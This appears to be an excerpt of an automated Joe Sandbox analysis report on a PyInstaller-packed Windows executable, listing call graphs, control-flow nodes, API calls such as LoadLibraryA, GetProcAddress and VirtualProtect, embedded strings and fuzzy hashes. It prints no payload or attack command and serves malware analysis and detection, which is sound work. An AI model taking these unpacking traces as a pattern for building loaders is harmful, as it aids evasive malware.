_invalid_parameter_noinfo 88522->88537 88524 7ff6b7514b1c 88540 7ff6b751a948 11 API calls 2 library calls 88524->88540 88525 7ff6b750c550 _log10_special 8 API calls 88528 7ff6b7501cc8 88525->88528 88527 7ff6b7514a2d 88527->88525 88528->87935 88529 7ff6b7514ad6 88529->88524 88530 7ff6b7514af1 88529->88530 88531 7ff6b7514b40 88529->88531 88533 7ff6b7514ae8 88529->88533 88538 7ff6b751a948 11 API calls 2 library calls 88530->88538 88531->88524 88534 7ff6b7514b4a 88531->88534 88533->88524 88533->88530 88539 7ff6b751a948 11 API calls 2 library calls 88534->88539 88536->88527 88537->88529 88538->88527 88539->88527 88540->88527 88544 7ff6b7515ec8 88541->88544 88542 7ff6b7515eee 88572 7ff6b7514f08 11 API calls _set_fmode 88542->88572 88544->88542 88546 7ff6b7515f21 88544->88546 88545 7ff6b7515ef3 88573 7ff6b751a8e0 37 API calls _invalid_parameter_noinfo 88545->88573 88548 7ff6b7515f27 88546->88548 88549 7ff6b7515f34 88546->88549 88574 7ff6b7514f08 11 API calls _set_fmode 88548->88574 88560 7ff6b751ac28 88549->88560 88551 7ff6b7504616 88551->88187 88554 7ff6b7515f48 88575 7ff6b7514f08 11 API calls _set_fmode 88554->88575 88555 7ff6b7515f55 88567 7ff6b751fecc 88555->88567 88558 7ff6b7515f68 88576 7ff6b7515478 LeaveCriticalSection 88558->88576 88577 7ff6b75202d8 EnterCriticalSection 88560->88577 88562 7ff6b751ac3f 88563 7ff6b751ac9c 19 API calls 88562->88563 88564 7ff6b751ac4a 88563->88564 88565 7ff6b7520338 _isindst LeaveCriticalSection 88564->88565 88566 7ff6b7515f3e 88565->88566 88566->88554 88566->88555 88578 7ff6b751fbc8 88567->88578 88570 7ff6b751ff26 88570->88558 88572->88545 88573->88551 88574->88551 88575->88551 88583 7ff6b751fc03 __vcrt_FlsAlloc 88578->88583 88580 7ff6b751fea1 88597 7ff6b751a8e0 37 API calls _invalid_parameter_noinfo 88580->88597 88582 7ff6b751fdd3 88582->88570 88590 7ff6b7526d54 88582->88590 88588 7ff6b751fdca 88583->88588 88593 7ff6b7517a3c 51 API calls 3 library calls 88583->88593 88585 7ff6b751fe35 88585->88588 88594 7ff6b7517a3c 51 API calls 3 library calls 88585->88594 88587 7ff6b751fe54 88587->88588 88595 7ff6b7517a3c 51 API calls 3 library calls 88587->88595 88588->88582 88596 7ff6b7514f08 11 API calls _set_fmode 88588->88596 88598 7ff6b7526354 88590->88598 88593->88585 88594->88587 88595->88588 88596->88580 88597->88582 88599 7ff6b7526389 88598->88599 88600 7ff6b752636b 88598->88600 88599->88600 88603 7ff6b75263a5 88599->88603 88652 7ff6b7514f08 11 API calls _set_fmode 88600->88652 88602 7ff6b7526370 88653 7ff6b751a8e0 37 API calls _invalid_parameter_noinfo 88602->88653 88609 7ff6b7526964 88603->88609 88607 7ff6b752637c 88607->88570 88655 7ff6b7526698 88609->88655 88612 7ff6b75269d9 88687 7ff6b7514ee8 11 API calls _set_fmode 88612->88687 88613 7ff6b75269f1 88675 7ff6b7518520 88613->88675 88616 7ff6b75269de 88688 7ff6b7514f08 11 API calls _set_fmode 88616->88688 88644 7ff6b75263d0 88644->88607 88654 7ff6b75184f8 LeaveCriticalSection 88644->88654 88652->88602 88653->88607 88656 7ff6b75266c4 88655->88656 88657 7ff6b75266de 88655->88657 88656->88657 88700 7ff6b7514f08 11 API calls _set_fmode 88656->88700 88660 7ff6b752675c 88657->88660 88702 7ff6b7514f08 11 API calls _set_fmode 88657->88702 88659 7ff6b75266d3 88701 7ff6b751a8e0 37 API calls _invalid_parameter_noinfo 88659->88701 88662 7ff6b75267ad 88660->88662 88704 7ff6b7514f08 11 API calls _set_fmode 88660->88704 88671 7ff6b752680a 88662->88671 88706 7ff6b7519b78 37 API calls 2 library calls 88662->88706 88665 7ff6b7526806 88668 7ff6b7526888 88665->88668 88665->88671 88666 7ff6b75267a2 88705 7ff6b751a8e0 37 API calls _invalid_parameter_noinfo 88666->88705 88707 7ff6b751a900 17 API calls _isindst 88668->88707 88670 7ff6b7526751 88703 7ff6b751a8e0 37 API calls _invalid_parameter_noinfo 88670->88703 88671->88612 88671->88613 88708 7ff6b75202d8 EnterCriticalSection 88675->88708 88687->88616 88688->88644 88700->88659 88701->88657 88702->88670 88703->88660 88704->88666 88705->88662 88706->88665 88710 7ff6b75178f8 88709->88710 88713 7ff6b75173d4 88710->88713 88712 7ff6b7517911 88712->88197 88714 7ff6b751741e 88713->88714 88715 7ff6b75173ef 88713->88715 88723 7ff6b751546c EnterCriticalSection 88714->88723 88724 7ff6b751a814 37 API calls 2 library calls 88715->88724 88718 7ff6b7517423 88720 7ff6b7517440 38 API calls 88718->88720 88719 7ff6b751740f 88719->88712 88721 7ff6b751742f 88720->88721 88722 7ff6b7515478 _fread_nolock LeaveCriticalSection 88721->88722 88722->88719 88724->88719 88726 7ff6b750fe71 88725->88726 88727 7ff6b750fe43 88725->88727 88729 7ff6b750fe63 88726->88729 88735 7ff6b751546c EnterCriticalSection 88726->88735 88736 7ff6b751a814 37 API calls 2 library calls 88727->88736 88729->88201 88731 7ff6b750fe88 88732 7ff6b750fea4 72 API calls 88731->88732 88733 7ff6b750fe94 88732->88733 88734 7ff6b7515478 _fread_nolock LeaveCriticalSection 88733->88734 88734->88729 88736->88729 88737->88218 88739 7ffe007a5c00 88740 7ffe007a5c1d 88739->88740 88740->88740 88741 7ffe007a5d23 88740->88741 88743 7ffe007a5d3e 88740->88743 88742 7ffe0076127b SetLastError 88741->88742 88744 7ffe007a5d39 88742->88744 88743->88744 88746 7ffe0076127b 88743->88746 88746->88744 88748 7ffe007a8a40 88746->88748 88747 7ffe007a8ac3 SetLastError 88747->88748 88749 7ffe007a8b27 88747->88749 88748->88747 88748->88749 88749->88744 88750 7ffe007d15a0 88751 7ffe007d15b8 88750->88751 88752 7ffe007d16c6 88751->88752 88754 7ffe00761c1c 88751->88754 88754->88751 88755 7ffe007a6e20 88754->88755 88757 7ffe007a6eec 88755->88757 88758 7ffe007614bf SetLastError 88755->88758 88759 7ffe007bf070 SetLastError 88755->88759 88760 7ffe00761df7 SetLastError 88755->88760 88761 7ffe00761a0f 88755->88761 88757->88751 88758->88755 88759->88755 88760->88755 88761->88755 88765 7ffe007aab70 88761->88765 88762 7ffe007614f1 SetLastError 88762->88765 88763 7ffe007ab8b6 88764 7ffe007aace7 88763->88764 88766 7ffe007ab8e1 00007FFE1FFB6570 88763->88766 88764->88755 88765->88762 88765->88763 88765->88764 88766->88764 88767 7ffe007ab906 00007FFE1FFB6570 88766->88767 88767->88764 88768 7ffe007ab926 00007FFE1FFB6570 88767->88768 88768->88764 88769 7ffe007ab93d 00007FFE1FFB6570 88768->88769 88769->88764 88770 7ffe007ab957 00007FFE1FFB6570 88769->88770 88770->88764 88771 7ffdfb429060 88772 7ffdfb429078 88771->88772 88776 7ffdfb429c01 88771->88776 88773 7ffdfb429b0e LoadLibraryA 88772->88773 88774 7ffdfb429b69 VirtualProtect VirtualProtect 88772->88774 88777 7ffdfb429b28 88773->88777 88774->88776 88776->88776 88777->88772 88778 7ffdfb429b47 GetProcAddress 88777->88778 88778->88777 88779 7ffdfb429b5e 88778->88779 88780 7ff6b7515628 88781 7ff6b751565f 88780->88781 88782 7ff6b7515642 88780->88782 88781->88782 88784 7ff6b7515672 CreateFileW 88781->88784 88805 7ff6b7514ee8 11 API calls _set_fmode 88782->88805 88786 7ff6b75156a6 88784->88786 88787 7ff6b75156dc 88784->88787 88785 7ff6b7515647 88806 7ff6b7514f08 11 API calls _set_fmode 88785->88806 88808 7ff6b751577c 59 API calls 3 library calls 88786->88808 88809 7ff6b7515c04 46 API calls 3 library calls 88787->88809 88791 7ff6b75156b4 88794 7ff6b75156bb CloseHandle 88791->88794 88795 7ff6b75156d1 CloseHandle 88791->88795 88792 7ff6b75156e1 88796 7ff6b7515710 88792->88796 88797 7ff6b75156e5 88792->88797 88793 7ff6b751564f 88807 7ff6b751a8e0 37 API calls _invalid_parameter_noinfo 88793->88807 88799 7ff6b751565a 88794->88799 88795->88799 88811 7ff6b75159c4 51 API calls 88796->88811 88810 7ff6b7514e7c 11 API calls 2 library calls 88797->88810 88802 7ff6b751571d 88812 7ff6b7515b00 21 API calls _fread_nolock 88802->88812 88804 7ff6b75156ef 88804->88799 88805->88785 88806->88793 88807->88799 88808->88791 88809->88792 88810->88804 88811->88802 88812->88804 88813 7ffe01311230 GetSystemInfo 88814 7ffe01311264 88813->88814 88815 7ffe01322250 88817 7ffe013222ab new[] 88815->88817 88819 7ffe013223fd 00007FFE1A463010 88817->88819 88821 7ffe01322408 new[] 88817->88821 88823 7ffe013223c4 88817->88823 88818 7ffe01322665 88822 7ffe013226de 88818->88822 88824 7ffe0130d9e0 3 API calls 88818->88824 88819->88821 88821->88822 88821->88823 88825 7ffe013192b0 88821->88825 88822->88823 88836 7ffe01318a10 88822->88836 88824->88822 88826 7ffe01319390 new[] 88825->88826 88827 7ffe01319335 new[] 88825->88827 88829 7ffe01319455 00007FFE1A463010 88826->88829 88833 7ffe01319679 88826->88833 88834 7ffe013195c2 88826->88834 88827->88826 88828 7ffe01319375 00007FFE1A463010 88827->88828 88827->88834 88828->88826 88830 7ffe01319477 00007FFE1A463010 88829->88830 88831 7ffe0131962b 88829->88831 88832 7ffe0131962e 00007FFE1A463010 00007FFE1A463010 88830->88832 88831->88832 88832->88833 88833->88834 88840 7ffe0130ffd0 88833->88840 88834->88818 88838 7ffe01318a43 88836->88838 88839 7ffe01318b54 88838->88839 88844 7ffe01317270 00007FFE1A463010 00007FFE1A463010 ReadFile 00007FFE1A463010 88838->88844 88839->88823 88842 7ffe01310021 88840->88842 88841 7ffe013101f0 CreateFileW 88841->88842 88842->88841 88843 7ffe013103a8 88842->88843 88843->88834 88844->88839 88845 7ffdfaf10350 88846 7ffdfaf10f30 88845->88846 88853 7ffdfaf10368 88845->88853 88847 7ffdfaf10e53 LoadLibraryA 88848 7ffdfaf10e6d 88847->88848 88849 7ffdfaf10e76 GetProcAddress 88848->88849 88848->88853 88849->88848 88851 7ffdfaf10e97 88849->88851 88852 7ffdfaf10ea2 VirtualProtect VirtualProtect 88852->88846 88853->88847 88853->88852 88854 7ff6b7502fe0 88855 7ff6b7502ff0 88854->88855 88856 7ff6b750302b 88855->88856 88858 7ff6b7503041 88855->88858 88882 7ff6b7502710 54 API calls _log10_special 88856->88882 88859 7ff6b7503061 88858->88859 88869 7ff6b7503077 __vcrt_freefls 88858->88869 88883 7ff6b7502710 54 API calls _log10_special 88859->88883 88860 7ff6b750c550 _log10_special 8 API calls 88862 7ff6b75031fa 88860->88862 88863 7ff6b7501470 116 API calls 88863->88869 88864 7ff6b7503349 88890 7ff6b7502710 54 API calls _log10_special 88864->88890 88865 7ff6b7501c80 49 API calls 88865->88869 88867 7ff6b7503333 88889 7ff6b7502710 54 API calls _log10_special 88867->88889 88869->88863 88869->88864 88869->88865 88869->88867 88870 7ff6b750330d 88869->88870 88872 7ff6b7503207 88869->88872 88881 7ff6b7503037 __vcrt_freefls 88869->88881 88888 7ff6b7502710 54 API calls _log10_special 88870->88888 88873 7ff6b7503273 88872->88873 88884 7ff6b751a404 37 API calls 2 library calls 88872->88884 88875 7ff6b7503290 88873->88875 88876 7ff6b750329e 88873->88876 88885 7ff6b751a404 37 API calls 2 library calls 88875->88885 88886 7ff6b7502dd0 37 API calls 88876->88886 88879 7ff6b750329c 88887 7ff6b7502500 54 API calls __vcrt_freefls 88879->88887 88881->88860 88882->88881 88883->88881 88884->88873 88885->88879 88886->88879 88887->88881 88888->88881 88889->88881 88890->88881 88891 7ffe01360d10 88892 7ffe01360d3c 88891->88892 88895 7ffe01360d41 88891->88895 88897 7ffe01384960 88892->88897 88894 7ffe01360e31 88895->88894 88901 7ffe0139e170 00007FFE1A463010 new[] 88895->88901 88898 7ffe01384979 88897->88898 88900 7ffe01384985 88897->88900 88902 7ffe01384890 88898->88902 88900->88895 88901->88894 88903 7ffe013848ca 88902->88903 88907 7ffe013848da 88902->88907 88908 7ffe013843d0 88903->88908 88905 7ffe0138492d 88905->88900 88906 7ffe013843d0 8 API calls 88906->88907 88907->88905 88907->88906 88918 7ffe013840d0 88908->88918 88910 7ffe0138448c 88911 7ffe01323790 4 API calls 88910->88911 88915 7ffe013844ba 88910->88915 88916 7ffe01384578 88910->88916 88912 7ffe01384514 88911->88912 88913 7ffe0138451a 88912->88913 88912->88916 88914 7ffe0138454f 00007FFE1A463010 88913->88914 88913->88915 88914->88915 88915->88907 88916->88915 88927 7ffe0135e490 00007FFE1A463010 88916->88927 88919 7ffe013840f2 88918->88919 88923 7ffe013840fb 88918->88923 88920 7ffe01384c70 6 API calls 88919->88920 88919->88923 88921 7ffe013841e2 88920->88921 88921->88923 88928 7ffe01335950 00007FFE1A463010 00007FFE1A463010 ReadFile 00007FFE1A463010 88921->88928 88923->88910 88924 7ffe013842ce 88929 7ffe013c22e0 88924->88929 88926 7ffe013842f4 88926->88910 88927->88915 88928->88924 88931 7ffe013c22f4 88929->88931 88932 7ffe013c23a1 88929->88932 88931->88932 88933 7ffe01322bb0 88931->88933 88932->88926 88935 7ffe01322bc8 88933->88935 88934 7ffe01318a10 4 API calls 88936 7ffe01322cb5 88934->88936 88935->88934 88935->88936 88936->88931 88946 7ffe00788150 88947 7ffe0078816a 88946->88947 88948 7ffe00788180 88947->88948 88950 7ffe0076112c 88947->88950 88950->88948 88951 7ffe0076ef00 88950->88951 88954 7ffe0076ef30 88951->88954 88953 7ffe0076ef1a 88953->88948 88955 7ffe00761325 88954->88955 88956 7ffe0076ef50 SetLastError 88955->88956 88957 7ffe0076ef70 88956->88957 88959 7ffe00761c1c 9 API calls 88957->88959 88958 7ffe0076efac 88958->88953 88959->88958 88960 7ffe00788e70 88961 7ffe00788e8a 88960->88961 88962 7ffe00788ea0 88961->88962 88964 7ffe0076204a 88961->88964 88964->88962 88965 7ffe0076f370 88964->88965 88966 7ffe0076f38a SetLastError 88965->88966 88967 7ffe0076f3aa 88966->88967 88968 7ffe0076f3ce 88967->88968 88970 7ffe007624aa 88967->88970 88968->88962 88970->88968 88973 7ffe007a8010 88970->88973 88971 7ffe007a820f 88971->88968 88972 7ffe0076127b SetLastError 88974 7ffe007a8154 88972->88974 88973->88971 88973->88972 88973->88974 88974->88971 88975 7ffe0076127b SetLastError 88974->88975 88975->88974

                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                              Function 00007FF6B7501000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 511COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 0 7ff6b7501000-7ff6b7503806 call 7ff6b750fe18 call 7ff6b750fe20 call 7ff6b750c850 call 7ff6b75153f0 call 7ff6b7515484 call 7ff6b75036b0 14 7ff6b7503814-7ff6b7503836 call 7ff6b7501950 0->14 15 7ff6b7503808-7ff6b750380f 0->15 20 7ff6b750383c-7ff6b7503856 call 7ff6b7501c80 14->20 21 7ff6b750391b-7ff6b7503931 call 7ff6b75045c0 14->21 17 7ff6b7503c97-7ff6b7503cb2 call 7ff6b750c550 15->17 25 7ff6b750385b-7ff6b750389b call 7ff6b7508830 20->25 28 7ff6b7503933-7ff6b7503960 call 7ff6b7507f90 21->28 29 7ff6b750396a-7ff6b750397f call 7ff6b7502710 21->29 34 7ff6b75038c1-7ff6b75038cc call 7ff6b7514f30 25->34 35 7ff6b750389d-7ff6b75038a3 25->35 37 7ff6b7503984-7ff6b75039a6 call 7ff6b7501c80 28->37 38 7ff6b7503962-7ff6b7503965 call 7ff6b751004c 28->38 39 7ff6b7503c8f 29->39 47 7ff6b75038d2-7ff6b75038e1 call 7ff6b7508830 34->47 48 7ff6b75039fc-7ff6b7503a2a call 7ff6b7508940 call 7ff6b75089a0 * 3 34->48 40 7ff6b75038a5-7ff6b75038ad 35->40 41 7ff6b75038af-7ff6b75038bd call 7ff6b75089a0 35->41 53 7ff6b75039b0-7ff6b75039b9 37->53 38->29 39->17 40->41 41->34 57 7ff6b75039f4-7ff6b75039f7 call 7ff6b7514f30 47->57 58 7ff6b75038e7-7ff6b75038ed 47->58 76 7ff6b7503a2f-7ff6b7503a3e call 7ff6b7508830 48->76 53->53 56 7ff6b75039bb-7ff6b75039d8 call 7ff6b7501950 53->56 56->25 68 7ff6b75039de-7ff6b75039ef call 7ff6b7502710 56->68 57->48 63 7ff6b75038f0-7ff6b75038fc 58->63 65 7ff6b7503905-7ff6b7503908 63->65 66 7ff6b75038fe-7ff6b7503903 63->66 65->57 69 7ff6b750390e-7ff6b7503916 call 7ff6b7514f30 65->69 66->63 66->65 68->39 69->76 79 7ff6b7503b45-7ff6b7503b53 76->79 80 7ff6b7503a44-7ff6b7503a47 76->80 81 7ff6b7503b59-7ff6b7503b5d 79->81 82 7ff6b7503a67 79->82 80->79 83 7ff6b7503a4d-7ff6b7503a50 80->83 84 7ff6b7503a6b-7ff6b7503a90 call 7ff6b7514f30 81->84 82->84 85 7ff6b7503b14-7ff6b7503b17 83->85 86 7ff6b7503a56-7ff6b7503a5a 83->86 95 7ff6b7503a92-7ff6b7503aa6 call 7ff6b7508940 84->95 96 7ff6b7503aab-7ff6b7503ac0 84->96 87 7ff6b7503b2f-7ff6b7503b40 call 7ff6b7502710 85->87 88 7ff6b7503b19-7ff6b7503b1d 85->88 86->85 90 7ff6b7503a60 86->90 97 7ff6b7503c7f-7ff6b7503c87 87->97 88->87 91 7ff6b7503b1f-7ff6b7503b2a 88->91 90->82 91->84 95->96 99 7ff6b7503be8-7ff6b7503bfa call 7ff6b7508830 96->99 100 7ff6b7503ac6-7ff6b7503aca 96->100 97->39 108 7ff6b7503c2e 99->108 109 7ff6b7503bfc-7ff6b7503c02 99->109 102 7ff6b7503ad0-7ff6b7503ae8 call 7ff6b7515250 100->102 103 7ff6b7503bcd-7ff6b7503be2 call 7ff6b7501940 100->103 111 7ff6b7503b62-7ff6b7503b7a call 7ff6b7515250 102->111 112 7ff6b7503aea-7ff6b7503b02 call 7ff6b7515250 102->112 103->99 103->100 115 7ff6b7503c31-7ff6b7503c40 call 7ff6b7514f30 108->115 113 7ff6b7503c04-7ff6b7503c1c 109->113 114 7ff6b7503c1e-7ff6b7503c2c 109->114 124 7ff6b7503b7c-7ff6b7503b80 111->124 125 7ff6b7503b87-7ff6b7503b9f call 7ff6b7515250 111->125 112->103 126 7ff6b7503b08-7ff6b7503b0f 112->126 113->115 114->115 122 7ff6b7503d41-7ff6b7503d63 call 7ff6b75044e0 115->122 123 7ff6b7503c46-7ff6b7503c4a 115->123 136 7ff6b7503d65-7ff6b7503d6f call 7ff6b7504630 122->136 137 7ff6b7503d71-7ff6b7503d82 call 7ff6b7501c80 122->137 127 7ff6b7503cd4-7ff6b7503ce6 call 7ff6b7508830 123->127 128 7ff6b7503c50-7ff6b7503c5f call 7ff6b75090e0 123->128 124->125 139 7ff6b7503ba1-7ff6b7503ba5 125->139 140 7ff6b7503bac-7ff6b7503bc4 call 7ff6b7515250 125->140 126->103 142 7ff6b7503d35-7ff6b7503d3c 127->142 143 7ff6b7503ce8-7ff6b7503ceb 127->143 144 7ff6b7503cb3-7ff6b7503cbd call 7ff6b7508660 128->144 145 7ff6b7503c61 128->145 152 7ff6b7503d87-7ff6b7503d96 136->152 137->152 139->140 140->103 154 7ff6b7503bc6 140->154 149 7ff6b7503c68 call 7ff6b7502710 142->149 143->142 151 7ff6b7503ced-7ff6b7503d10 call 7ff6b7501c80 143->151 160 7ff6b7503cbf-7ff6b7503cc6 144->160 161 7ff6b7503cc8-7ff6b7503ccf 144->161 145->149 162 7ff6b7503c6d-7ff6b7503c77 149->162 167 7ff6b7503d12-7ff6b7503d26 call 7ff6b7502710 call 7ff6b7514f30 151->167 168 7ff6b7503d2b-7ff6b7503d33 call 7ff6b7514f30 151->168 157 7ff6b7503dc4-7ff6b7503dda call 7ff6b7509390 152->157 158 7ff6b7503d98-7ff6b7503d9f 152->158 154->103 170 7ff6b7503ddc 157->170 171 7ff6b7503de8-7ff6b7503e04 SetDllDirectoryW 157->171 158->157 164 7ff6b7503da1-7ff6b7503da5 158->164 160->149 161->152 162->97 164->157 169 7ff6b7503da7-7ff6b7503dbe SetDllDirectoryW LoadLibraryExW 164->169 167->162 168->152 169->157 170->171 175 7ff6b7503f01-7ff6b7503f08 171->175 176 7ff6b7503e0a-7ff6b7503e19 call 7ff6b7508830 171->176 180 7ff6b7503f0e-7ff6b7503f15 175->180 181 7ff6b7504008-7ff6b7504010 175->181 189 7ff6b7503e32-7ff6b7503e3c call 7ff6b7514f30 176->189 190 7ff6b7503e1b-7ff6b7503e21 176->190 180->181 182 7ff6b7503f1b-7ff6b7503f25 call 7ff6b75033c0 180->182 183 7ff6b7504035-7ff6b7504040 call 7ff6b75036a0 call 7ff6b7503360 181->183 184 7ff6b7504012-7ff6b750402f PostMessageW GetMessageW 181->184 182->162 196 7ff6b7503f2b-7ff6b7503f3f call 7ff6b75090c0 182->196 200 7ff6b7504045-7ff6b7504067 call 7ff6b7503670 call 7ff6b7506fc0 call 7ff6b7506d70 183->200 184->183 201 7ff6b7503ef2-7ff6b7503efc call 7ff6b7508940 189->201 202 7ff6b7503e42-7ff6b7503e48 189->202 193 7ff6b7503e23-7ff6b7503e2b 190->193 194 7ff6b7503e2d-7ff6b7503e2f 190->194 193->194 194->189 207 7ff6b7503f64-7ff6b7503fa7 call 7ff6b7508940 call 7ff6b75089e0 call 7ff6b7506fc0 call 7ff6b7506d70 call 7ff6b75088e0 196->207 208 7ff6b7503f41-7ff6b7503f5e PostMessageW GetMessageW 196->208 201->175 202->201 206 7ff6b7503e4e-7ff6b7503e54 202->206 210 7ff6b7503e5f-7ff6b7503e61 206->210 211 7ff6b7503e56-7ff6b7503e58 206->211 247 7ff6b7503ff5-7ff6b7504003 call 7ff6b7501900 207->247 248 7ff6b7503fa9-7ff6b7503fbf call 7ff6b7508ed0 call 7ff6b75088e0 207->248 208->207 210->175 213 7ff6b7503e67-7ff6b7503e83 call 7ff6b7506dc0 call 7ff6b7507340 210->213 212 7ff6b7503e5a 211->212 211->213 212->175 227 7ff6b7503e85-7ff6b7503e8c 213->227 228 7ff6b7503e8e-7ff6b7503e95 213->228 232 7ff6b7503edb-7ff6b7503ef0 call 7ff6b7502a50 call 7ff6b7506fc0 call 7ff6b7506d70 227->232 230 7ff6b7503eaf-7ff6b7503eb9 call 7ff6b75071b0 228->230 231 7ff6b7503e97-7ff6b7503ea4 call 7ff6b7506e00 228->231 243 7ff6b7503ec4-7ff6b7503ed2 call 7ff6b75074f0 230->243 244 7ff6b7503ebb-7ff6b7503ec2 230->244 231->230 246 7ff6b7503ea6-7ff6b7503ead 231->246 232->175 243->175 257 7ff6b7503ed4 243->257 244->232 246->232 247->162 248->247 261 7ff6b7503fc1-7ff6b7503fd6 248->261 257->232 262 7ff6b7503ff0 call 7ff6b7502a50 261->262 263 7ff6b7503fd8-7ff6b7503feb call 7ff6b7502710 call 7ff6b7501900 261->263 262->247 263->162
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                              • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                                                                                                                                                                                                              • API String ID: 2776309574-3273434969
                                                                                                                                                                                                                                              • Opcode ID: d52c1960cc45de78c26c9f57622ace5a14626686e839aa839f1fc42fe00fc1f1
                                                                                                                                                                                                                                              • Instruction ID: f3c13057bcb0795d7ae581c6e9239222db61db7870566825c6748627edfbdb5b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d52c1960cc45de78c26c9f57622ace5a14626686e839aa839f1fc42fe00fc1f1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BE327923A0CA8291FB299B2DD4553B927A1AF44788F84443ADB5DC32F6EF2CF559C344
                                                                                                                                                                                                                                              Function 00007FFE00761A0F Relevance: 23.6, APIs: 5, Strings: 8, Instructions: 858COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: $..\s\ssl\record\ssl3_record.c$CONNE$GET $HEAD $POST $PUT $ssl3_get_record
                                                                                                                                                                                                                                              • API String ID: 0-2781224710
                                                                                                                                                                                                                                              • Opcode ID: b400293baa34000780f5a339118ca863fb8810f07702305baec27cbd6e082666
                                                                                                                                                                                                                                              • Instruction ID: 637683ed405d1f1fee13467d312e42959eeff2dbaff3ceb2a85fc6b553e79e9b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b400293baa34000780f5a339118ca863fb8810f07702305baec27cbd6e082666
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 84828061A0AA8281FB60BB21D4547B922A0EF86784F5C4036EB4D477BEDF7CE985C711
                                                                                                                                                                                                                                              Function 00007FFE013192B0 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 513COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
